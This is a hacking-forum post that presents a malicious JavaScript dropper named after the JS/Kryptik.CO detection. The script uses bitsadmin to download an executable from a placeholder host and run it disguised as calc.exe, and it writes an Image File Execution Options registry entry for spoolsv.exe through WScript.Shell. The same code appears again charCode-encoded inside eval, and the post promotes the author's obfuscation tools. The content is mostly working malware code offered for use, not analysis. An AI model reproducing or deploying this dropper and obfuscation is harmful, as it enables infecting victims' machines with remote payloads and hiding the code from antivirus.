Email:Pass Virus: JS/Kryptik.CO

hacxx

Member
Joined
25 Mar 2021
Messages
746
Reaction score
50
Points
48
Virus: JS/Kryptik.CO
https://www.virusradar.com/en/JS_Kryptik.CO/description

Initial Code:
Code:
<script>var denial = 'cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://127.0.0.1/1.exe c:\windows\temp\calc.exe & start c:\windows\temp\calc.exe'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolsv.exe',denial);</script>

JS CharCode Encoded Code: (Detected as JS/Kryptik.CO)
Code:
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,104,97,99,120,120,39,41,59,32,118,97,114,32,100,101,110,105,97,108,32,61,32,39,99,109,100,46,101,120,101,32,47,99,32,98,105,116,115,97,100,109,105,110,32,47,116,114,97,110,115,102,101,114,32,75,117,110,97,109,105,32,47,100,111,119,110,108,111,97,100,32,47,112,114,105,111,114,105,116,121,32,104,105,103,104,32,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,101,120,101,32,99,58,92,119,105,110,100,111,119,115,92,116,101,109,112,92,99,97,108,99,46,101,120,101,32,38,32,115,116,97,114,116,32,99,58,92,119,105,110,100,111,119,115,92,116,101,109,112,92,99,97,108,99,46,101,120,101,39,59,32,118,97,114,32,83,104,101,108,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,83,104,101,108,108,39,41,59,32,83,104,101,108,108,46,82,101,103,87,114,105,116,101,40,39,72,75,76,77,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,32,78,84,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,73,109,97,103,101,32,70,105,108,101,32,69,120,101,99,117,116,105,111,110,32,79,112,116,105,111,110,115,92,115,112,111,111,108,115,118,46,101,120,101,39,44,100,101,110,105,97,108,41,59))</script>

Use
- Hacxx CharCode Encoder 2.html
- Hacxx JS CharCode HTML Obfuscator